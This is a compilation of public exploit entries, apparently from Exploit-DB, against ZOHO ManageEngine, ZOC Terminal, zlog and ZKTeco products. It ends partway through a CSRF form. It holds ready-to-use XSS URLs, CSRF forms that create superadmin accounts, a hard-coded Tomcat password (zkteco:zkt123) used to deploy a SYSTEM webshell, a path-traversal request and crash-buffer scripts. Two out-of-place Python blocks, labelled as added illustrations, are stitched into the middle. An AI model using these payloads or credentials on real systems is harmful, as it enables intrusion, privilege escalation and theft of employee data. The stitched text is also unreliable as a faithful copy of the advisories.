
source: https://www.securityfocus.com/bid/50717/info

ZOHO ManageEngine ADSelfService Plus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

ManageEngine ADSelfService Plus 4.5 Build 4521 is vulnerable; other versions may also be affected. 

Proof of Concept
===================
Double-Quote String Termination
HTTP Request =
https://serverip:port/EmployeeSearch.cc?searchType=contains&searchBy=ALL_FIELDS&searchString=";alert("XSS");//\"

Response Source View
<script language="javascript">
var searchValue = "';alert(XSS)//\"";


Single-Quote String Termination
Similarly...
HTTP Request
https://serverip:port/EmployeeSearch.cc?searchType=';document.location="http://www.cnn.com";//\"&searchBy=ALL_FIELDS&searchString=BoB
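As an added illustration (not code from the advisory or the vendor), the following Python sketch reproduces the vulnerable pattern, a raw parameter concatenated into a double-quoted JavaScript string literal, beside a safe encoder, and a small checker that reports whether a payload escapes the string context. The checker models the `var searchValue = "...";` statement shown in the response above; the function names and the payload constants are my own.

```python
import json

# The statement the advisory shows in the response source, with the raw
# searchString parameter dropped straight into a double-quoted JS literal.
VULN_TEMPLATE = 'var searchValue = "{}";'
SAFE_PREFIX = 'var searchValue = '


def vulnerable_render(search_string: str) -> str:
    """The unsafe pattern: no encoding for the JS string context."""
    return VULN_TEMPLATE.format(search_string)


def js_string_literal(value: str) -> str:
    """Encode `value` as a JavaScript string literal that is safe inside <script>.

    json.dumps escapes quotes, backslashes and control characters (and, with the
    default ensure_ascii=True, the U+2028/U+2029 line terminators too); the only
    extra step is breaking up '</' so the HTML parser cannot see '</script>'.
    """
    return json.dumps(value).replace('</', '<\\/')


def safe_render(search_string: str) -> str:
    """The hardened pattern: the value is one JS literal, whatever it contains."""
    return SAFE_PREFIX + js_string_literal(search_string) + ';'


def string_literal_end(js: str, start: int) -> int:
    """Index just past the string literal opening at js[start], or -1 if unterminated.

    A backslash consumes the next character, which is exactly why the advisory's
    trailing  \\"  neutralises the application's own closing quote.
    """
    quote = js[start]
    i = start + 1
    while i < len(js):
        if js[i] == '\\':
            i += 2
            continue
        if js[i] == quote:
            return i + 1
        i += 1
    return -1


def escapes_string_context(statement: str) -> bool:
    """True unless `statement` is exactly  var searchValue = <one string literal>;"""
    if not statement.startswith(SAFE_PREFIX):
        return True
    end = string_literal_end(statement, len(SAFE_PREFIX))
    return end == -1 or statement[end:] != ';'


# The two payloads from the advisory, constructed here as Python strings.
DOUBLE_QUOTE_PAYLOAD = '";alert("XSS");//\\"'
SINGLE_QUOTE_PAYLOAD = '\';document.location="http://www.cnn.com";//\\"'


if __name__ == '__main__':
    for payload in (DOUBLE_QUOTE_PAYLOAD, SINGLE_QUOTE_PAYLOAD):
        for label, render in (('vulnerable', vulnerable_render), ('safe', safe_render)):
            js = render(payload)
            verdict = 'breaks out' if escapes_string_context(js) else 'contained'
            print(f'{label:10} {js}  -> {verdict}')
```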
            
# Exploit Title: Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) Privilege Escalation
# Date: 15th April 2019
# Exploit Author: Digital Interruption
# Vendor Homepage: https://www.manageengine.co.uk/
# Version: 6.6 (Build 6658)
# Tested on: Windows Server 2012 R2
# CVE : CVE-2018-19374

Due to weak permissions set on the bin, lib and tools directories within the ManageEngine installation directory, any authenticated user can modify several core files.

To escalate privileges to that of LOCAL SYSTEM, drop a payload onto the system and then add a line to bin\ChangeJRE.bat to execute it every time the system is rebooted.
            
# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files... 
#5.- Select the "Private key file:" field, erase its content and paste the clipboard
#6.- Click on "Create public/private key files..."
#7.- Crashed

buffer = "\x41" * 2000
f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
f.write(buffer)
f.close()
            
#Exploit Title:  ZOC Terminal v7.23.4  - 'Shell' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_sh.py
#2.- Open zoc_sh.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select Options > Program Settings... > Special Files
#5.- Select the "Shell" field, erase its content and paste the clipboard
#6.- Click on "Save"
#7.- Select View > "Command Shell" and select "ok"
#8.- Crashed

cod = "\x41" * 270

f = open('zoc_sh.txt', 'w')
f.write(cod)
f.close()
            
#Exploit Title:  ZOC Terminal v7.23.4  - 'Private key file' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_pkf.py
#2.- Open zoc_pkf.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files... 
#5.- Select the "Private key file:" field, erase its content and paste the clipboard
#6.- Click on "Create public/private key files..."
#7.- Crashed

cod = "\x41" * 2000

f = open('zoc_pkf.txt', 'w')
f.write(cod)
f.close()
            
#!/usr/bin/python

#[+] Author: SATHISH ARTHAR
#[+] Exploit Title:  ZOC Terminal Emulator-v7 Memory Corruption PoC
#[+] Date: 14-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows7/windows8 
#[+] Vendor: http://www.emtec.com
#[+] Download: http://www.emtec.com/downloads/zoc/zoc7051.exe
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks:   offensive security (@offsectraining)

 

print("###########################################################")
print("#  Title: ZOC Terminal Emulator-v7  Memory Corruption PoC  #")
print("#  Author: SATHISH ARTHAR                                  #")
print("#  Category: DoS/PoC                                       # ")
print("###########################################################")
print("Copy the content of CRASH.TXT in connect to option and set Connection type to Windows Modems")
print(" Quick Connection ----> Connection type: Windows Modems ----> connect")


crash = "A" * 200  # 200-byte string that triggers the crash when pasted into the connection field
filename = "CRASH.TXT"
file = open(filename, "w")
file.write(crash)
print("\n Files Created!\n")
file.close()
            
# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "ZOC_7.25.5_Script.zrx"
# 2.- Open ZOC Terminal
# 3.- Select Script > Start REXX Script... 
# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
# 5.- Crashed

cod = "\x41" * 20000

f = open('ZOC_7.25.5_Script.zrx', 'w')
f.write(cod)
f.close()
            
#Exploit Title:  ZOC Terminal v7.23.4  - 'Script' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx"
#2.- Open ZOC Terminal
#3.- Select Script > Start REXX Script... 
#4.- Select "exp.zrx" file and click "open"
#5.- Crashed

cod = "\x41" * 20000

f = open('exp.zrx', 'w')
f.write(cod)
f.close()
            
#!/usr/bin/python
"""
# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
# Date: 20-5-2015
# Vendor homepage: www.emtec.com
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
# Author: Dolev Farhi

# Details:
# --------
# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the
# server address and attempt to connect.
"""

filename = "zoc.txt"
buffer = "\x41" * 97  # 97 bytes is enough to overwrite the SEH record in the tested version
textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()
            
# Exploit Title: zlog 1.2.15 - Buffer Overflow
# Date: 10/23/2021
# Exploit Author: LIWEI
# Vendor Homepage:  https://github.com/HardySimpson/zlog
# Software Link: https://github.com/HardySimpson/zlog
# Version: v1.2.15
# Tested on: ubuntu 18.04.2
# 1.- Compile the zlog v1.2.15 code to a library.
# 2.- Use the "zlog_init" API to parse a file. You can do it as in my testcase below.
# 3.- Crash, because it made a stack-buffer-overflow READ.
# 4.- Also, you can get a stack-buffer-overflow WRITE when the pointer's address that the overflow reads from ends with "0x20".
# 5.- Here is the crash backtrace.
#0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15
#1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7
#2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18
#3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6
#4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18

And also my testcase:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>   /* getpid(), unlink() */
#include "zlog.h"

/* libFuzzer entry point: write the fuzz input to a temporary file and
 * hand it to zlog_init(), which parses it as a zlog configuration. */
int
LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
        char filename[256];
        snprintf(filename, sizeof(filename), "/tmp/libfuzzer.%d", getpid());

        FILE *fp = fopen(filename, "wb");
        if (!fp)
                return 0;
        fwrite(data, size, 1, fp);
        fclose(fp);

        /* The overflow is hit inside zlog_conf_build_with_file(), reached from here. */
        int rc = zlog_init(filename);
        if (rc == 0)
        {
                zlog_fini();
        }
        unlink(filename);
        return 0;
}

Put my testcase in his project and change the compile line to CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++"
Use ./configure under his project as shown in his README.txt. You will get a binary with the testcase's name; run it and you will reproduce the crash.
            
Exploit Title: ZKTime Web Software 2.0 - Broken Authentication
CVE-ID: CVE-2017-14680
Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vendor of Product: ZKTeco
Affected Product Code: ZKTime Web - 2.0.1.12280
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind

------------------------------------------

Product description:
ZKTime Web 2.0 is a cutting-edge web-based time attendance software which
provides stable communication with devices through GPRS/WAN, so users
can access the software anywhere from their web browser to remotely manage
hundreds of T&A terminals under complex network conditions (WLAN). The
application has an administrator role and an application user role.

Attack Description:
The application is time attendance software that allows users to
download their time and attendance data from the application in PDF
format. The data includes the employees' id, user-id, gender,
birth dates, phone numbers and access areas. These PDF files, however, are
not protected by authentication: any user who obtains the file-download
link can download these files directly without authenticating.

Proof of Concept Links:

1) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144237.pdf
2) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144238.pdf
3) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144239.pdf


Impact:
Personal details of the company's employees are disclosed without their
permission, which violates user privacy. Moreover, the information can be
used to mount further attacks.

References:
http://seclists.org/fulldisclosure/2017/Sep/39
http://seclists.org/bugtraq/2017/Sep/20
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14680


Vulnerability Timeline:
18th August 2017 – Vulnerability Discovered
20th August 2017 – Contacted Vendor – No Response
1st September 2017 – Contacted Vendor again – No Response
18th September 2017 – Vulnerability Disclosed

            
Exploit Title: ZKTime Web Software 2.0 - Cross Site Request Forgery
CVE-ID: CVE-2017-13129
Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vendor of Product: ZKTeco
Affected Product Code: ZKTime Web - 2.0.1.12280
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind

------------------------------------------

Product description:
ZKTime Web 2.0 is a cutting-edge web-based time attendance software which
provides stable communication with devices through GPRS/WAN, so users
can access the software anywhere from their web browser to remotely manage
hundreds of T&A terminals under complex network conditions (WLAN). The
application has an administrator role and an application user role.

Attack Description:
The ZKTime Web Software allows the Administrator to elevate the privileges
of an application user by a simple click of a radio button named
"superuser". However, when the request is generated there are no random
tokens attached to it to prevent Cross Site Request Forgery attacks.
Moreover, there are no other protection mechanisms (such as administrator
password verification) in place to block forged requests.
An attacker takes advantage of this scenario and creates a crafted link to
add himself as an administrator of the ZKTime Web Software. He then uses
social engineering to trick the administrator into clicking the forged
HTTP request. The request is executed and the attacker becomes the
Administrator of the ZKTime Web Software.

Proof of Concept Code:
Forged HTTP Request used by the attacker:
<html>
    <body>
    <form action="http://XX.XX.XX.46:8081/data/auth/User/14/" method="POST">
      <input type="hidden" name="pk" value="" />
      <input type="hidden" name="username" value="Pentestuser1" />
      <input type="hidden" name="Password" value="" />
      <input type="hidden" name="ResetPassword" value="" />
      <input type="hidden" name="fpidnum" value="" />
      <input type="hidden" name="fpcount" value="0" />
      <input type="hidden" name="tlng" value="en" />
      <input type="hidden" name="first_name" value="Pentest" />
      <input type="hidden" name="last_name" value="User" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="is_staff" value="on" />
      <input type="hidden" name="is_superuser" value="on" />
      <input type="hidden" name="last_login" value="2017-08-20 14:14:34" />
      <input type="hidden" name="initial-last_login" value="2017-08-20 14:14:34" />
      <input type="hidden" name="date_joined" value="2017-08-20 14:14:34" />
      <input type="hidden" name="initial-date_joined" value="2017-08-20 14:14:34" />
      <input type="hidden" name="finnger" value="" />
      <input type="hidden" name="template" value="" />
      <input type="hidden" name="finger10" value="" />
      <input type="hidden" name="template10" value="" />
      <input type="hidden" name="delfp" value="" />
      <input type="hidden" name="actflag" value="" />
      <input type="submit" value="Submit request" />
    </form>
</body>
</html>

Impact:
If the vulnerability is successfully exploited, an attacker (who would
be a normal user of the web application) can escalate his privileges and
become the administrator of ZKTime Web Software.

References:
http://seclists.org/fulldisclosure/2017/Sep/38
http://seclists.org/bugtraq/2017/Sep/19
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13129

Vulnerability Timeline:
18th August 2017 – Vulnerability Discovered
20th August 2017 – Contacted Vendor – No Response
1st September 2017 – Contacted Vendor again – No Response
18th September 2017 – Vulnerability Disclosed

            
ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.6
                  3.0.1.5 (160622)
                  3.0.1.1 (160216)

Summary: ZKTime.Net V3.0 is a new generation time attendance
management software. Meanwhile, it integrates with time attendance
and access control system. Some frequently used functions such as
attendance reports, device management and employee management can
be managed directly on the home page which providing excellent user
experience. Owing to the Pay code function, it can generate both
time attendance records and corresponding payroll in the software
and easy to merge with the most ERP and Payroll software, which can
rapidly upgrade your working efficiency. The brand new flat GUI design
and humanized structure will make your daily management more pleasant
and convenient.

Desc: ZKTime.Net suffers from an elevation of privileges vulnerability:
a low-privileged user can replace the executable file with a binary of
choice. The vulnerability exists due to improper permissions, with the 'C'
flag (Change) granted to the 'Everyone' group, making the entire
'ZKTimeNet3.0' directory and its files and sub-directories world-writable.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5360
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5360.php


18.07.2016

--


C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0"
c:\Program Files (x86)\ZKTimeNet3.0
                Everyone                  Change [RWXD]
                NT SERVICE\TrustedInstaller Special Access [A]
                NT AUTHORITY\SYSTEM       Special Access [A]
                BUILTIN\Administrators    Special Access [A]
                BUILTIN\Users             Special Access [RX]
                CREATOR OWNER             Special Access [A]


C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe"
c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe
                Everyone                  Change [RWXD]



C:\Program Files (x86)>cacls ZKTimeNet3.0
C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
                                    NT SERVICE\TrustedInstaller:(ID)F
                                    NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                    NT AUTHORITY\SYSTEM:(ID)F
                                    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                    BUILTIN\Administrators:(ID)F
                                    BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                    BUILTIN\Users:(ID)R
                                    BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
                                                                  GENERIC_READ
                                                                  GENERIC_EXECUTE

                                    CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files (x86)\ZKTimeNet3.0>cacls *.exe
C:\Program Files (x86)\ZKTimeNet3.0\LanguageTranslate.exe Everyone:C
                                                          Everyone:(ID)C
                                                          NT AUTHORITY\SYSTEM:(ID)F
                                                          BUILTIN\Administrators:(ID)F
                                                          BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
                                                 NT AUTHORITY\SYSTEM:(ID)F
                                                 BUILTIN\Administrators:(ID)F
                                                 BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.DBTT.exe Everyone:C
                                                       Everyone:(ID)C
                                                       NT AUTHORITY\SYSTEM:(ID)F
                                                       BUILTIN\Administrators:(ID)F
                                                       BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
                                                  Everyone:(ID)C
                                                  NT AUTHORITY\SYSTEM:(ID)F
                                                  BUILTIN\Administrators:(ID)F
                                                  BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.Update.exe Everyone:C
                                                         Everyone:(ID)C
                                                         NT AUTHORITY\SYSTEM:(ID)F
                                                         BUILTIN\Administrators:(ID)F
                                                         BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.ZKTime5DB.exe Everyone:C
                                                            Everyone:(ID)C
                                                            NT AUTHORITY\SYSTEM:(ID)F
                                                            BUILTIN\Administrators:(ID)F
                                                            BUILTIN\Users:(ID)R
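The cacls listing above is the evidence a permissions audit looks for. As an added example (not part of the advisory), here is a Python parser for cacls-style output that flags every ACE granting Write, Change or Full control to a principal every local user belongs to; the same check covers the weak bin/lib/tools permissions described in the ADManager Plus entry earlier. The sample input is constructed to mirror the advisory's listing, with one correctly permissioned file added for contrast, and the function names are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the layout of `cacls` output, mirroring the advisory's
# listing (abridged) plus one correctly permissioned file for contrast.
SAMPLE = r"""
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
                                                  Everyone:(ID)C
                                                  NT AUTHORITY\SYSTEM:(ID)F
                                                  BUILTIN\Administrators:(ID)F
                                                  BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
                                                 NT AUTHORITY\SYSTEM:(ID)F
                                                 BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
                                    NT AUTHORITY\SYSTEM:(ID)F
                                    BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
                                                                  GENERIC_READ
                                                                  GENERIC_EXECUTE

                                    CREATOR OWNER:(OI)(CI)(IO)(ID)F

C:\Program Files (x86)\GoodApp\good.exe NT AUTHORITY\SYSTEM:(ID)F
                                        BUILTIN\Administrators:(ID)F
                                        BUILTIN\Users:(ID)R
"""

# One ACE as cacls prints it: principal, optional inheritance flags, then either
# permission letters or the "(special access:)" marker followed by indented rights.
ACE_RE = re.compile(
    r'(?P<who>(?:NT AUTHORITY|NT SERVICE|BUILTIN)\\[^:]+|CREATOR OWNER|Everyone)'
    r':(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[A-Z]+|\(special access:\))$')
DRIVE_RE = re.compile(r'^[A-Za-z]:\\')      # first line of a path's ACL starts with the path
RIGHT_RE = re.compile(r'^\s+([A-Z_]+)$')    # e.g. GENERIC_READ under "(special access:)"

# Principals any local user belongs to; write access for them is what made the
# ZKTime.Net binaries (and the ADManager Plus bin/lib/tools directories) replaceable.
LOW_PRIV = {'Everyone', 'BUILTIN\\Users',
            'NT AUTHORITY\\Authenticated Users', 'NT AUTHORITY\\INTERACTIVE'}
WRITE_PERMS = {'W', 'C', 'F'}              # cacls letters: Write, Change (RWXD), Full
WRITE_RIGHTS = {'GENERIC_WRITE', 'GENERIC_ALL', 'FILE_GENERIC_WRITE',
                'FILE_WRITE_DATA', 'FILE_APPEND_DATA', 'WRITE_DAC', 'WRITE_OWNER'}


@dataclass
class Ace:
    who: str
    flags: str
    perm: str                               # 'R', 'C', 'F', ... or 'special'
    rights: list = field(default_factory=list)


@dataclass
class Entry:
    path: str
    aces: list = field(default_factory=list)


def parse_cacls(text: str) -> list:
    """Turn cacls output into Entry objects; tolerant of blank lines inside an entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            continue
        ace = ACE_RE.search(line)
        if DRIVE_RE.match(line):            # new path: everything before the ACE is the path
            path = line[:ace.start()].rstrip() if ace else line.strip()
            entries.append(Entry(path))
        if ace and entries:
            perm = 'special' if ace.group('perm').startswith('(') else ace.group('perm')
            entries[-1].aces.append(Ace(ace.group('who'), ace.group('flags'), perm))
            continue
        right = RIGHT_RE.match(line)
        if right and entries and entries[-1].aces:
            entries[-1].aces[-1].rights.append(right.group(1))
    return entries


def grants_write(ace: Ace) -> bool:
    return ace.perm in WRITE_PERMS or bool(WRITE_RIGHTS & set(ace.rights))


def find_writable(text: str) -> list:
    """(path, principal, permission) for every ACE that lets a low-privileged user write."""
    return [(e.path, a.who, a.perm)
            for e in parse_cacls(text)
            for a in e.aces
            if a.who in LOW_PRIV and grants_write(a)]


if __name__ == '__main__':
    for path, who, perm in find_writable(SAMPLE):
        print(f'WRITABLE  {path}  by {who} ({perm})')
```

Feeding the real output of `cacls` on an installation directory (or the `showacls` output above, after adapting the regex to its column layout) to `find_writable` reproduces the finding in both advisories.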
            
ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The ZKBioSecurity solution suffers from use of hard-coded credentials.
The application comes bundled with a pre-configured Apache Tomcat server and an
exposed 'manager' application. After authenticating with the credentials
username: zkteco, password: zkt123, located in the tomcat-users.xml file, it allows
a malicious WAR archive containing a JSP application to be uploaded, thus giving
the attacker the ability to execute arbitrary code with SYSTEM privileges.

Ref: https://www.exploit-db.com/exploits/31433/


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5362
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php


18.07.2016

--


Contents of tomcat-users.xml:
-----------------------------

C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:

<?xml version='1.0' encoding='utf-8'?>
...
...
...
<role rolename="manager-gui"/>  
<role rolename="manager-script"/>  
<role rolename="manager-jmx"/>  
<role rolename="manager-status"/>  
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>  
</tomcat-users>

-----------------------------


Open Manager application and login:
-----------------------------------

http://127.0.0.1:8088/manager (zkteco:zkt123)


Deploy JSP webshell, issue command:
-----------------------------------

- Request: whoami
- Response: nt authority\system


To call the findConnectors() method of the Service, use:
--------------------------------------------------------

http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=

Response:

OK - Operation findConnectors returned:
  Connector[HTTP/1.1-8088]
  Connector[AJP/1.3-8019]


List of all loaded servlets:
----------------------------

http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet
            

ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: File path manipulation vulnerabilities arise when user-controllable data
is placed into a file or URL path that is used on the server to access
local resources, which may be within or outside the web root. An attacker can
modify the file path to access different resources, which may contain sensitive
information. Even where an attack is constrained within the web root, it is often
possible to retrieve items that are normally protected from direct access, such
as application configuration files, the source code for server-executable scripts,
or files with extensions that the web server is not configured to serve directly.



Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5365
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php


18.07.2016

--


http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
            
<!--

ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.



Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5364
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php


18.07.2016

-->


<html>
  <body>
    <form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="authUser&#46;username" value="thricer" />
      <input type="hidden" name="authUser&#46;loginPwd" value="111111" />
      <input type="hidden" name="repassword" value="111111" />
      <input type="hidden" name="authUser&#46;isActive" value="true" />
      <input type="hidden" name="authUser&#46;isSuperuser" value="true" />
      <input type="hidden" name="groupIds" value="1" />
      <input type="hidden" name="deptIds" value="1" />
      <input type="hidden" name="areaIds" value="1" />
      <input type="hidden" name="authUser&#46;email" value="lab@zeroscience.mk" />
      <input type="hidden" name="authUser&#46;name" value="test" />
      <input type="hidden" name="authUser&#46;lastName" value="lasttest" />
      <input type="hidden" name="fingerTemplate" value="&#13;" />
      <input type="hidden" name="fingerId" value="&#13;" />
      <input type="hidden" name="logMethod" value="add" />
